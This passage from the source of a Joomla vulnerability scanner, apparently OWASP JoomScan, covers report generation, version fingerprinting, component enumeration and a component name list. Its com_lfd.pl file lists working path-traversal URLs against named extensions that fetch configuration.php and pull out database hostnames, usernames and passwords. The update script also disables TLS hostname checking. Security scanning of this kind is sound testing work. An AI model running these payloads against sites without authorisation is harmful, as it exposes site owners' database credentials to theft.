9Pcm84SHIwdU9nSk1qZ1BtaEZRdmZzcVVLVW9wcGViTy9aMDY0dkJScWl5UnMzaXI3R3k2QnIwUS9RMjBtOTlMZjN3M1MrSWpBa3diQW1acXdJdFhOOTEwazFKS3FiODg5cWk5N3pXU0MrSjhPOFZZSzBtdjYwZ0VtSFlHbUM2RVhGb3hmdng0ZGZEQnc4emZQaUo1eGVBSlFGMWhZYUVhTUdDQWx6cHAxcnZkUnVxaXpCRmcyamxnVGtSN1dyTlJGbU0vWUZsQlFZSEhsZUlYWFhTUkNScXZndU9YSThEa3J1TnVGSmtWdWJrQ25iRHRVUWw2UWZ1d2hvWUd2dmU5NzZuTm16Zkh6anZ2dk5pMGFkTmlzVmpNdTI0UmVybG9SRG5xaDhta2Flajk2RDVESnMwQ3Z0S2xTeGV1dU9JS05XSENCUGJ0MjZkZWZ2bGxac3lZd2E1ZHU5U0REejRZRTh1cFh6UU51UXVZZERQWG5rS1hDRFhwKzZJNE0ydldMQldMeFhqOTlkZlZ3SUVEWS9uNStVeWNPSkcxYTlkNmx0RmlBcXBRWjhwRkkrZGR5MUNlNCsrd1ZZb3FSUlExR3IrZEJ0d0JNR0hDQkpXWGwwY3NGcU4vLy82eFR6LzlWRlZVVktoVnExYkZseTlmSGtNdjhid2M3YzJsaFVBVFVRc0Q1bU8wYXo2SXF0R3RVc3dNOThNOUg4dzU1NXlqTHIzMFVxNjY2aXExWXNVS1ZWSlNFbCs4ZURGejVzeFJsWldWZWFMMFhrQmlQK2lJY2hBd3I2S2RhMEgwWCtpbVZoNGRKT0pwLzM3OStxbHp6ejFYVlZkWHE2NWR1ekpyMWl5V0xsMGFHenQyYkh6Um9rWDVJaXIrQjExRmt4YmtMaEdIYVFVZHBncTlSaVlWelFCK1o0SHVIcUI4MEtCQjZxNjc3bElMRml3Z0ZvdHgvZlhYcTVxYUdrcExTOVhNbVRNOWNQNFJuWG9aVVFmZ01LRFRKVk1wdVQreWZwdUNYcVhIaUJFaktDb3FvbHUzYnBTWGw2dmk0bUkxZXZUbytQejU4OW15WlV1ZStIZ3ViNlZuaXpoTVN6dGxoUHFRdkt4RG9hc205TFpPUDRpbVhrWnhJRDVwMHFTR09YUG1OSng5OXRuMTgrZlByKy9UcDQvblVMTnI2MmVUWENtYWRzbVB5SEdYRFl3NEFCTkQ1NmZZYldKYzlkZk0wcWRtbTd2Nnh4OS9mTjhOTjl4UUs1N2VhdUQ0Rm53bUd6RDFKSmRPaXdEVFFvQUIrQWFwUzNHQTlnamJGUlBxdksyaW9tSmZYbDZlOTRWZjNjTFBaQVBHdTQrSXc3UVNZTXBvV3ZyaDF4L3hScEliZHRiUzFHbmRpeGM5MkFyUFpBUEdXK3dlQVNiTGdQRUxCZXhHTjRwNEc3MHEwV1ZkbVEyeFBYSGs3Zk1jZ1A4aVM3VmlNNkI0Tk5XdFl5VjVOQk00UmI1VW00NjBkQnB2NFpoWkl4ZjB3djJxTmdKTEJKaFc4TU9ZdEQzRnZxTkpYUExxVFk0WlZuaEh6UEMyNGk1UlBLbVZPVXdxT3RUeWR6UTRKbWdCaWN0SFdwc2FJMTlNK3dCTUp4SUw4M2xKVWZrR1lHcUFGOXNZTEpGSWFpZUE2WTFlUUcremYzT3MxYkpGZ0lrQVF4R0o5Vms4SDR4Sk8zeVU1UmF6L0J4L1J5S3BuUURHTlRsMjR0VXV0SGUzcmF5aXVBUEVFYlVSWUdLV2N1dWFuRTVrMkM0dVF5cVZhM3JrOVJ1SVdmY2RVUnNBeHVYanNObC9EMUszRGM0MjliUUEydUFBY2FUVHRCRmc5cEs4d042ckR1bFJIOUxyODl4YzZtMkJ0OVpoNW0rUHBydHRBTE1UWFd2T28zeVpwQnJqdDNKMFI1RFdvcU9OLzllaXZjdjJzNjJJcHJ0dEFOT0lqaEY1NU1XT2RsdHNmMUlyUGNOQWRFOUZqNnBFNFRaMW1qM29xdU1SdFFGZ3NGNStua3pPWHJHT1BEb0hYVTY5cGVsc21zckdOd0liNVArbVNLeTB1R0pFclF5WXQ5Q2xVazB1VTJ2cENRUFFsVEJia3JxUzJBeDlHN3BEV3lHSlJRRmViV1V6UHdLTVF4OVliSm0xK1FJWU16cjlmV0JRQzk3L05CTGpXbXVFMDNXMnJLWVhvcWx1VzhCQVlrWHZ6dksxNzBUM1VETE4zZDlhK2tTMjZHUVNHM3R1RmlBWGs5aXBiUW02c0dKRTJhQm1OTmdxUWhjOU5MdTh2b1JlaEc5M2wzMGd5N2Q5TElucG9RcTl6dWxPZExLNitmdlVhSmF6aUpGbXR2Qzd6SnFjMWNCYzlIcnBCZ2RvT21maC9zY0xOekhIZmhmZGxtYytpVzF3VnBHODBpR2lOZ1JNb1NqQWRoZVNXY0JmU1Y2cThqSzY4M3dtVkNvNmtWMEhaaFh3MzhCTk5DMTVTZFhTT0tJMkJBem81U05tODh3R0VVdlhvdHZyK1ZYMkRndWNNckdFWHNkZDh1eHFBY1p5YTkrTHpkVFJJbklBSm1ZQ3hXc1JuQUg5RlBpSjhYY2R1cWZSaStoS21kOGt1WENRNTB4N0VWM3ViRE82a2tNUjJsUGNEOTNyNEZpTWl1UUdQWWV1VFZNSVhJOHVCbUJhUzErUmZ5UEtBbUN5b2ZUYTlLajFoZGVpTzVNY0Qxd3Nsb3BmOC9DNDdOdEZVeFZ3djlKanF3V2d3OUhkVFJZNWp2bEdOTTN0VnlSNTFBdGQrY0VHd2p4MEhidkI2QklmQzlEbDRkT3RvL2VXS0xZanhWei9Ga2JUcjhncXlqM0FnQzZFK0tKakV0KzB2dnBEMEF2aG5oZEhteDlJbG9sMU5kRnd4UFZETDlIZEhZRWw5d0dET003bU9pWnpOM0F2eVZVekI2QXJWMDFHeDUvT0FjNUNyMzBxc2pqWXhXSkMyMk52UXNlVUlzcEJ3SGcwamNUV2ZHWkQ3MmVBNmNDcFFIZWY4L1BSS1JLWG9iM0ZuL2h3b2Rkb3Vhb1FFYldRbGVSSG84VjYrbnFLWTNham84bWVmOFZiUGRtSDFIR28xU0t1YmlYS3BzdEpLeWtWZlIzZGFEU2VnYkpyYnl2RVNob1VUV1hIRWtrdUdvWDJ5aTVLWVdMYld6M2FnL3NRdWhEamdHZ0tPNjVJOHFPZTZPcFZoNkViZWZWREp6eDVudGw2dEdPdkVyMUcreU4wWWxSZE5IMXRLNUppcmNSWkl1b2dGTVZhSW9vQUUxSEwwZjhOQU0rRlN1VGVBK0ltQUFBQUFFbEZUa1N1UW1DQyIgc3R5bGU9Im1hcmdpbi10b3A6MTBweCI+DQoJPGRpdiBjbGFzcz0iY2VudGVyIiBzdHlsZT0ibWFyZ2luOmF1dG87d2lkdGg6ODAlOyI+CQ0KPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyB0b3A6IDM1cHg7IHBhZGRpbmc6IDVweDsgaGVpZ2h0OiA3OXB4OyBib3JkZXI6IDRweCBzb2xpZCByZ2IoMjE3LCAyMjAsIDIyOSk7IGJhY2tncm91bmQ6IHJnYigyMTAsIDIxNCwgMjIzKSBub25lIHJlcGVhdCBzY3JvbGwgMHB4IDBweDsgY29sb3I6IHRlYWw7Ij4NCgkJVVJMIDogPHNwYW4gc3R5bGU9ImNvbG9yOiMxZTI3MmMiPiR0YXJnZXQ8L3NwYW4+PGJyPg0KCQkJSm9vbWxhIFZlcnNpb24gOiA8c3BhbiBzdHlsZT0iY29sb3I6IzFlMjcyYyI+JHZidmVyc2lvbjwvc3Bhbj48YnI+DQoNCgkJCVN0YXJ0IFRpbWUgOiA8c3BhbiBzdHlsZT0iY29sb3I6IzFlMjcyYyI+JHN0aW1lPC9zcGFuPjxicj4NCgkJCUZpbmlzaCBUaW1lIDogPHNwYW4gc3R5bGU9ImNvbG9yOiMxZTI3MmMiPiRmdGltZTwvc3Bhbj48YnI+DQoJCTwvZGl2Pg0KCQk8dGFibGU+DQoJCQk8dHI+DQoJCQkJPHRoPlZ1bG5lcmFiaWxpdHk8L3RoPg0KCQkJPC90cj4NCgkJCSRib2R5DQoNCgkJPC90YWJsZT4NCgkJPHAgc3R5bGU9ImRpc3BsYXk6YmxvY2s7Y29sb3I6IzFhNWY4OSI+PHNtYWxsPkdlbmVyYXRlZCBvbiAxMy85LzIwMTYgMjA6NTc6NCBUdWVzZGF5IGJ5IDxhIGhyZWY9Imh0dHBzOi8vd3d3Lm93YXNwLm9yZy9pbmRleC5waHAvQ2F0ZWdvcnk6T1dBU1BfSm9vbWxhX1Z1bG5lcmFiaWxpdHlfU2Nhbm5lcl9Qcm9qZWN0IiBzdHlsZT0iY29sb3I6IzUwOTViZjtjdXJzb3I6cG9pbnRlciI+T1dBU1AgSm9vbVNjYW4gJHZlcnNpb248L2E+IChDb2RlIE5hbWU6ICRjb2RlbmFtZSk8L3NtYWxsPjwvcD4JPC9kaXY+PC9ib2R5PjwvaHRtbD4='; 3 | 4 | our $target="$target/"; 5 | 6 | $html=decode_base64($reportencode); 7 | 8 | 9 | #localtime 10 | @weekday = ("Sunday", "Monday", "Tuesday", "Wednesday", "thursday", "Friday", "Saturday"); 11 | ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();; 12 | $year = $year + 1900; 13 | $mon += 1; 14 | $ftime="$mday/$mon/$year $hour:$min:$sec $weekday[$wday]"; 15 | 16 | #replace info 17 | $html =~ s/\$target/$target/g; 18 | $html =~ s/\$codename/$codename/g; 19 | $html =~ s/\$version/$version/g; 20 | $html =~ s/\$ftime/$ftime/g; 21 | $html =~ s/\$stime/$stime/g; 22 | $html =~ s/\$vbversion/$ver/g; 23 | 24 | #htmltmp 25 | $tmpbody=' 26 | 27 |

28 |     

[+] $title

29 |

30 |     

$datail

31 |

32 |   
33 | ';
34 | 
35 | #txtlog
36 | if($target =~ /http:\/\/(.*?)\//){our $li=$1;}
37 | if($target =~ /https:\/\/(.*?)\//){our $li=$1;}
38 | $tmptarget="$1";
39 | mkdir "reports/$tmptarget";
40 | 
41 | open(my $fh, '>', "reports/$tmptarget/$tmptarget\_report\_$year-$mon-$mday\_at\_$hour.$min.$sec.txt");
42 | our $log="$log";
43 | print $fh "$log";
44 | close $fh;
45 | 
46 | 
47 | #htmllog
48 | for($i=0;$i<=$#dlog;$i++){
49 |   $tbody=$tmpbody;
50 |   $tbody =~ s/\$i/$i/g;
51 |   $tflog[$i] =~ s/\n/\n\/g;
52 |   if($tflog[$i] =~ m/1337false/i){$color="red";}else{$color="green";}
53 |   $tflog[$i]  =~ s/1337false//g;
54 |   if ($can_regexp) {
55 |     $tflog[$i]  =~ s( ($RE{URI}{HTTP}) ) ($1)gx ;
56 |   }
57 |   $tflog[$i]  =~ s/\[\+\+\] //g;
58 |   $tbody =~ s/\$color/$color/g;
59 |   
60 | 
61 |   $tbody =~ s/\$datail/$tflog[$i]/g;
62 |   $dlog[$i]  =~ s/Checking for//g;
63 |   $dlog[$i]  =~ s/Checking //g;
64 |   $dlog[$i]  =~ s/Detecting //g;
65 |   $dlog[$i]  =~ s/Finding //g;
66 | 
67 |   $tbody =~ s/\$title/$dlog[$i]/g;
68 | 
69 |   $body.=$tbody;  
70 | }
71 | 
72 | $html =~ s/\$body/$body/g;
73 | 
74 | 
75 | 
76 | 
77 | 
78 | open(my $fh, '>', "reports/$tmptarget/$tmptarget\_report\_$year-$mon-$mday\_at\_$hour.$min.$sec.html");
79 | print $fh "$html";
80 | close $fh;
81 | 
82 | 
83 | print color("yellow");
84 | print "\n\nYour Report : reports/$tmptarget/\n";
85 | 


--------------------------------------------------------------------------------
/core/update.pl:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/perl
 2 | 
 3 | my $can_https=1;
 4 | eval "use LWP::Protocol::https";
 5 | if($@) { $can_https=0; }
 6 | 
 7 | if (!$can_https) {
 8 |   print color("red");
 9 |   print "[+] Update requires HTTPS, but module LWP::Protocol::https is not available!\n\n";
10 |   print color("reset");
11 |   exit (1);
12 | }
13 | 
14 | my $browser = LWP::UserAgent->new;
15 | $browser->timeout(60);
16 | $browser = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
17 | $browser->protocols_allowed( [ 'http','https'] );
18 | 
19 | 
20 | 
21 | print "\n[+] Checking newest version\n";
22 | 
23 | my $response = $browser->get('https://raw.githubusercontent.com/rezasp/joomscan/master/version');
24 | 
25 | if($response->is_success){
26 | 	if($response->decoded_content !~ /$version/)
27 | 	{
28 | 		print "\n[!] New version available on https://github.com/rezasp/joomscan/releases/latest\n\n";
29 | 	}else
30 | 	{
31 | 		 print "\n[!] No new version available\n\n";
32 | 
33 | 	}
34 | 
35 | }else{
36 | 	print "\nNetwork error!\n";
37 | }
38 | 


--------------------------------------------------------------------------------
/core/ver.pl:
--------------------------------------------------------------------------------
 1 | #start Version finder
 2 | dprint("Detecting Joomla Version");
 3 | 
 4 | $ua->timeout(60);
 5 | 
 6 | my $response = $ua->get("$target");
 7 | if (!$response->is_success) {
 8 |     print color("red");
 9 |     print "[++] The target is not alive!\n\n";
10 |     print color("reset");
11 |     if (!$urlfile) {exit 0;} else {next;}
12 | }
13 | 
14 | $ua->timeout($timeout);
15 | 
16 | $source=$ua->get("$target/")->as_string;
17 | if($source =~ /X-Meta-Generator\:(.*?)\n/){
18 | $ppp=$1;
19 |     if($ppp =~ /[0-9]+(\.[0-9]+)+/g){
20 |         $ver="Joomla $&";
21 |     }
22 | }
23 | if($ver !~ m/\./i){
24 |     @vers = ('administrator/manifests/files/joomla.xml','language/en-GB/en-GB.xml','administrator/components/com_content/content.xml','administrator/components/com_plugins/plugins.xml','administrator/components/com_media/media.xml','mambots/content/moscode.xml');
25 |     foreach $verc(@vers){
26 |             $source=$ua->get("$target/$verc")->decoded_content;
27 |             if($source =~ /\(.*?)\<\/version\>/){
28 |                 $ver="Joomla $1";
29 |                 last;
30 |             }
31 |     }
32 | }
33 | if($ver !~ m/\./i){
34 |     @vers = ('language/en-GB/en-GB.xml','templates/system/css/system.css','media/system/js/mootools-more.js','language/en-GB/en-GB.ini','htaccess.txt','language/en-GB/en-GB.com_media.ini');
35 |     foreach $verc(@vers){
36 |             $source=$ua->get("$target/$verc")->decoded_content;
37 |             if($source =~ /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ or $source =~ /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ or $source =~ /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ or $source =~ /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ or $source =~ /20196 2011\-01\-09 02\:40\:25Z ian/){
38 |                 $ver="Joomla 1.6";
39 |                 last;
40 |             }elsif($source =~ /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / or $source =~ /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ or $source =~ /22183 2011\-09\-30 09\:04\:32Z infograf768/ or $source =~ /21660 2011\-06\-23 13\:25\:32Z infograf768/){
41 |                 $ver="Joomla 1.7";
42 |                 last;
43 |             }elsif($source =~ /Joomla! 1.5/ or $source =~ /MooTools\=\{version\:\'1\.12\'\}/ or $source =~ /11391 2009\-01\-04 13\:35\:50Z ian/){
44 |                 $ver="Joomla 1.5";
45 |                 last;
46 |             }elsif($source =~ /Copyright \(C\) 2005 \- 2012 Open Source Matters/ or $source =~ /MooTools.More\=\{version\:\"1\.4\.0\.1\"/){
47 |                 $ver="Joomla 2.5";
48 |                 last;
49 |             }elsif($source =~ /\s+get("$target/README.txt")->decoded_content;
61 |     if($source =~ /package to version (.*?)\n/){
62 |         $ver="Joomla $1";
63 |     }
64 | }
65 | 
66 | $ver =~ tr/[0-9][a-z][A-Z][\.]\ //cd;
67 | #if( $ver =~ /\d\.\d\.\d+/ and length($ver) > 25) {$ver= "Joomla $&";}  
68 | 
69 | if($ver !~ m/\./i){fprint("ver 404\n")}else{tprint("$ver");}
70 |  
71 | #end Version finder
72 | 


--------------------------------------------------------------------------------
/exploit/com_lfd.pl:
--------------------------------------------------------------------------------
 1 | #start com_lfd module Checker
 2 | @lfds = ('index.php?option=com_joomanager&controller=details&task=download&path=configuration.php','plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=','components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','index.php?option=com_macgallery&view=download&albumid=../../configuration.php','index.php?option=com_cckjseblod&task=download&file=configuration.php','plugins/content/fsave/download.php?filename=configuration.php','components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=configuration.php','index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php','plugins/system/captcha/playcode.php?lng=configuration.php','index.php?option=com_rsfiles&task=download&path=../../configuration.php&Itemid=137','index.php?option=com_addproperty&task=listing&propertyId=73&action=filedownload&fname=../configuration.php','administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes','index.php?option=com_jtagmembersdirectory&task=attachment&download_file=/../../../../configuration.php','index.php?option=com_facegallery&task=imageDownload&img_name=../../configuration.php','plugins/content/s5_media_player/helper.php?fileurl=../../../configuration.php','components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==','modules/mod_dvfoldercontent/download.php?f=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==','components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php','index.php?option=com_jetext&task=download&file=../../configuration.php','index.php?option=com_product_modul&task=download&file=../../../../../configuration.php&id=1&Itemid=1','plugins/content/wd/wddownload.php?download=wddownload.php&file=../../../configuration.php','index.php?option=com_community&view=groups&groupid=33&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&Itemid=0','index.php?option=com_download-monitor&file=configuration.php');
 3 | foreach $lfd(@lfds){
 4 | 	$source=$ua->get("$target/$lfd")->decoded_content;
 5 | 	if ($source =~ /\$ftp_pass/g or $source =~ /\$error_reporting/g or $source =~ /\/usr\/sbin\/sendmail/g   or  $source =~ /JConfig/g or $source =~ m/\$dbtype/i || $source =~ m/force_ssl/i || $source =~ m/mosConfig_secret/i || $source =~ m/mosConfig_dbprefix/i ) {
 6 | 		dprint("Checking for LFD vulnerability in modules");
 7 | 		$source =~ /host = (.*?)\;/;
 8 | 		my $hostname = $1;
 9 | 		$source =~ /user = (.*?)\;/;
10 | 		my $dbuser = $1;
11 | 		$source =~ /password = (.*?)\;/;
12 | 		my $dbpass = $1;
13 | 		$source =~ /\$db = (.*?)\;/;
14 | 		my $dbdb = $1;
15 | 
16 | 		my $conftmp="";
17 | 		$conftmp="hostname: $hostname\ndbuser: $dbuser\ndbpass: $dbpass\ndbname: $dbdb" if(length($hostname)>4);
18 | 		$conftmp  =~ s/\'//g;
19 | 
20 | 		tprint("Local File Disclosure found\nPoC: $target/$lfd\n$conftmp");
21 | 	}
22 | }
23 | #end com_lfd module Checker 


--------------------------------------------------------------------------------
/exploit/components.pl:
--------------------------------------------------------------------------------
  1 | #start find components
  2 | use version;
  3 | do "$mepath/core/compare.pl";
  4 | $btf=0;
  5 | @ffiles = ('WS_FTP.LOG','README.txt','readme.txt','README.md','readme.md','LICENSE.TXT','license.txt','LICENSE.txt','licence.txt','CHANGELOG.txt','changelog.txt','MANIFEST.xml','manifest.xml','error_log','error.log');
  6 | 
  7 | $ua->requests_redirectable(undef);
  8 | 
  9 | open(my $DB,"$mepath/exploit/db/componentslist.txt");
 10 | while( my $row = <$DB>)  {
 11 | 	chomp $row;
 12 | 
 13 | 	$tmp="";
 14 | 	$response=$ua->get("$target/components/$row/");
 15 | 	my $headers  = $response->headers();
 16 | 	my $content_type =$headers->content_type();
 17 | 	if ($response->status_line =~ /200/g ) {
 18 | 		$tmp.="Name: $row\nLocation : $target/components/$row/\n";
 19 | 
 20 | 		$source=$response->decoded_content;
 21 | 		if ($source =~ /Index of/g or $source =~ /Last modified<\/a>/g) {
 22 | 			$tmp.="Directory listing is enabled : $target/components/$row/\n";
 23 | 		}
 24 | 		$btf=1;
 25 | 
 26 | 		#components/com_
 27 | 		foreach $ffile(@ffiles){
 28 | 			$response=$ua->get("$target/components/$row/$ffile");
 29 | 			my $headers  = $response->headers();
 30 | 			my $content_type =$headers->content_type();
 31 | 			if ($response->status_line =~ /200/g ) {
 32 | 				chomp $ffile;
 33 | 				$tmp.="$ffile : $target/components/$row/$ffile\n";
 34 | 					
 35 | 			}
 36 | 		}
 37 | 		
 38 | 		#Version finder
 39 | 		$xm=$row;
 40 | 		$xm=~ s/com_//g;
 41 | 
 42 | 		my $comversion;
 43 | 		$response=$ua->get("$target/components/$row/$xm.xml");
 44 | 		my $headers  = $response->headers();
 45 | 		$sourcer=$response->decoded_content;
 46 | 		if ($response->status_line =~ /200/g ) {
 47 | 			$sourcer =~ /type=\"component\" version=\"(.*?)\"/;
 48 | 			$comversion = $1;
 49 | 			$tmp.="Installed version : $comversion\n";
 50 | 			
 51 | 				}
 52 | 		
 53 | 		open(my $FB,"exploit/db/comvul.txt");
 54 | 		while( my $row = <$FB>)  {
 55 | 			my @matches;
 56 | 			while ($row =~/\[(.*?)\]/g) {
 57 | 			push @matches, $1;
 58 | 		}
 59 | 
 60 | 					if ( @matches[1] eq $xm) {
 61 | 							#compare install version vs fixed version
 62 | 							 if($comversion =~ /\./ and @matches[6] =~ /\./){
 63 | 							 $tmp.="$comversion\n";
 64 | 								 $a=$comversion;
 65 | 								 $b=@matches[6];
 66 | 								 	if(&version_compare("$a","$b") == -1) {
 67 | 
 68 | 								 		$tmp.= "[!] We found vulnerable component\n";
 69 | 									 }else{
 70 | 										$tmp.="[!] We found the component \"com_$xm\", but since the component version was not available we cannot ensure that it's vulnerable, please test it yourself.\n";
 71 | 									}
 72 | 								  
 73 | 							 }else{
 74 | 								$tmp.="[!] We found the component \"com_$xm\", but since the component version was not available we cannot ensure that it's vulnerable, please test it yourself.\n";
 75 | 							}
 76 | 							
 77 | 							$tmp.= "Title : ". @matches[0] . "\n" if @matches[0] !~ /-/;
 78 | 							$tmp.=  "Exploit date : ". @matches[2]. "\n" if @matches[2] !~ /-/;
 79 | 							$tmp.=  "Reference : http://www.cvedetails.com/cve/CVE-". @matches[3]. "\n" if @matches[3] !~ /^-$/ and @matches[3] !~ /\,/;
 80 | 							if(index(@matches[3], ',') != -1){
 81 | 								print 123;
 82 | 								@pp=split(/\,/,@matches[3]);
 83 | 								$tmtm="";
 84 | 								foreach $tt(@pp){
 85 | 									$tmtm.= "Reference : http://www.cvedetails.com/cve/CVE-$tt\n";
 86 | 								}
 87 | 								$tmp.= $tmtm;
 88 | 							}
 89 | 							$tmp.=  "Reference : https://www.exploit-db.com/exploits/". @matches[5]. "\n" if @matches[5] !~ /-/;
 90 | 							$tmp.=  "Component : ". @matches[4]. "\n" if @matches[4] !~ /-/;
 91 | 							$tmp.=  "Fixed in : ". @matches[6]. "\n" if @matches[6] !~ /-/;
 92 | 							#$tmp.=  "Introduced in : ". @matches[7]. "\n" if @matches[7] !~ /-/;				 
 93 | 					} 
 94 | 		
 95 | 			}
 96 | 			close $FB;
 97 | 
 98 | 		
 99 | 		
100 | 		#admin/components/com_
101 | 		if($amtf==1){
102 | 			foreach $ffile(@ffiles){
103 | 				$response=$ua->get("$target/$adming/components/$row/$ffile");
104 | 				my $headers  = $response->headers();
105 | 				my $content_type =$headers->content_type();
106 | 				if ($response->status_line =~ /200/g ) {
107 | 					chomp $ffile;
108 | 					$tmp.="$ffile : $target/$adming/components/$row/$ffile\n";
109 | 						
110 | 				}
111 | 			}
112 | 		}
113 | 	}	
114 | 	if($tmp){
115 | 			dprint("Enumeration component ($row)");
116 | 			tprint($tmp);
117 | 		}	
118 | }
119 | 
120 | 
121 | 
122 | 
123 | if($btf==0){
124 | 	dprint("Enumeration component");
125 | 	fprint("components are not found");
126 | }
127 | #end find components
128 | 


--------------------------------------------------------------------------------
/exploit/db/componentslist.txt:
--------------------------------------------------------------------------------
   1 | com_5starhotels
   2 | com_ContentBlogList
   3 | com_Eventing
   4 | com_Fabrik
   5 | com_K2
   6 | com_Projectfork
   7 | com_a3000
   8 | com_a6mambocredits
   9 | com_a6mambohelpdesk
  10 | com_aardvertiser
  11 | com_ab
  12 | com_ab_gallery
  13 | com_abbrev
  14 | com_abc
  15 | com_abook
  16 | com_about
  17 | com_abstract
  18 | com_acajoom
  19 | com_acctexp
  20 | com_aceftp
  21 | com_aclassf
  22 | com_aclassfb
  23 | com_aclsfgpl
  24 | com_acmisc
  25 | com_acooldebate
  26 | com_acprojects
  27 | com_acstartseite
  28 | com_acteammember
  29 | com_actions
  30 | com_activities
  31 | com_actualite
  32 | com_acymailing
  33 | com_acysms
  34 | com_adagency
  35 | com_addressbook
  36 | com_adds
  37 | com_admin
  38 | com_adsmanager
  39 | com_advancedpoll
  40 | com_advert
  41 | com_advertisementboard
  42 | com_advertising
  43 | com_affiliatetracker
  44 | com_agency
  45 | com_agenda
  46 | com_agora
  47 | com_agoragroup
  48 | com_aicontactsafe
  49 | com_airmonoblock
  50 | com_aist
  51 | com_ajax
  52 | com_ajax-shoutbox
  53 | com_ajaxchat
  54 | com_ajaxquiz
  55 | com_akeeba
  56 | com_akobook
  57 | com_akocomment
  58 | com_akogallery
  59 | com_alameda
  60 | com_alberghi
  61 | com_album
  62 | com_alert
  63 | com_alfcontact
  64 | com_alfresco
  65 | com_alfurqan
  66 | com_alfurqan15x
  67 | com_allcinevid
  68 | com_allhotels
  69 | com_alphacontent
  70 | com_alphauserpoints
  71 | com_altas
  72 | com_altauserpoints
  73 | com_amblog
  74 | com_aml_2
  75 | com_amocourse
  76 | com_annonces
  77 | com_annuaire
  78 | com_answers
  79 | com_appointinator
  80 | com_appointment
  81 | com_aprice
  82 | com_arcadegames
  83 | com_archeryscores
  84 | com_artforms
  85 | com_article
  86 | com_articleman
  87 | com_articlemanager
  88 | com_articles
  89 | com_artist
  90 | com_artlinks
  91 | com_artportal
  92 | com_as
  93 | com_asortyment
  94 | com_astatspro
  95 | com_autartimonial
  96 | com_autartitarot
  97 | com_autostand
  98 | com_availcal
  99 | com_avosbillets
 100 | com_avreloaded
 101 | com_awd_song
 102 | com_awdwall
 103 | com_awesom
 104 | com_awiki
 105 | com_aysquiz
 106 | com_b2portfolio
 107 | com_babackup
 108 | com_banners
 109 | com_bayesiannaivefilter
 110 | com_bazaar
 111 | com_bbs
 112 | com_bca-rss-syndicator
 113 | com_be
 114 | com_beamospetition
 115 | com_bearleague
 116 | com_beeheard
 117 | com_bfquiz_sqli
 118 | com_bfquiztrial
 119 | com_bfsurvey
 120 | com_bfsurvey_basic
 121 | com_bfsurvey_pro
 122 | com_bfsurvey_profree
 123 | com_biblestudy
 124 | com_biblioteca
 125 | com_bidding
 126 | com_biitatemplateshop
 127 | com_billyportfolio
 128 | com_biographies
 129 | com_bit
 130 | com_blog
 131 | com_blog_calendar
 132 | com_blogfactory
 133 | com_bnf
 134 | com_book
 135 | com_bookflip
 136 | com_bookjoomlas
 137 | com_booklibrary
 138 | com_booklibrary_1
 139 | com_bookmarks
 140 | com_bookpro
 141 | com_books
 142 | com_boss
 143 | com_br
 144 | com_breezingforms
 145 | com_brightweblinks
 146 | com_bsadv
 147 | com_bsq
 148 | com_bsqsitestats
 149 | com_bt_media
 150 | com_bulkenquery
 151 | com_business
 152 | com_buslicense
 153 | com_ca
 154 | com_caddy
 155 | com_calcbuilder
 156 | com_calendar
 157 | com_calendario
 158 | com_calendarplanner
 159 | com_camelcitydb2
 160 | com_camp
 161 | com_candle
 162 | com_canteen
 163 | com_caproductprices
 164 | com_car
 165 | com_carman
 166 | com_cartikads
 167 | com_cartweberp
 168 | com_casino
 169 | com_casino_blackjack
 170 | com_casinobase
 171 | com_catalog
 172 | com_catalogproduction
 173 | com_catalogshop
 174 | com_catalogue
 175 | com_category
 176 | com_catfiltering
 177 | com_cb
 178 | com_cbcontact
 179 | com_cbe
 180 | com_cbresumebuilder
 181 | com_ccboard
 182 | com_ccinvoices
 183 | com_ccnewsletter
 184 | com_cgtestimonial
 185 | com_checklist
 186 | com_chronoconnectivity
 187 | com_chronocontact
 188 | com_cincopa
 189 | com_cinema
 190 | com_civicrm
 191 | com_cjlib
 192 | com_ckforms
 193 | com_clan
 194 | com_clan_members
 195 | com_clanlist
 196 | com_clantools
 197 | com_clasifier
 198 | com_classified
 199 | com_classifieds
 200 | com_clickheat
 201 | com_cloner
 202 | com_clubmanager
 203 | com_cmimarketplace
 204 | com_cmotour
 205 | com_cms
 206 | com_collector
 207 | com_colophon
 208 | com_color
 209 | com_colorlab
 210 | com_commedia
 211 | com_comments
 212 | com_community
 213 | com_communitypolls
 214 | com_communityquiz
 215 | com_communitysurveys
 216 | com_comp
 217 | com_competitions
 218 | com_component
 219 | com_comprofiler
 220 | com_connect
 221 | com_contact
 222 | com_contact_enhanced
 223 | com_contactformmaker
 224 | com_contactinfo
 225 | com_content
 226 | com_contentbloglist
 227 | com_contenthistory
 228 | com_contentmap
 229 | com_controller
 230 | com_contushdvideoshare
 231 | com_convertforms
 232 | com_countries
 233 | com_coupon
 234 | com_cpeventcalendar
 235 | com_cpg
 236 | com_creativecontactform
 237 | com_crhotels
 238 | com_cropimage
 239 | com_crowdsource
 240 | com_custompages
 241 | com_cvmaker
 242 | com_cwtags
 243 | com_cx
 244 | com_d-greinar
 245 | com_d3000
 246 | com_dadamail
 247 | com_dailymeals
 248 | com_dailymessage
 249 | com_dashboard
 250 | com_datafeeds
 251 | com_dateconverter
 252 | com_datsogallery
 253 | com_dbquery
 254 | com_dcnews
 255 | com_dcs_flashgames
 256 | com_delicious
 257 | com_departments
 258 | com_detail
 259 | com_dhforum
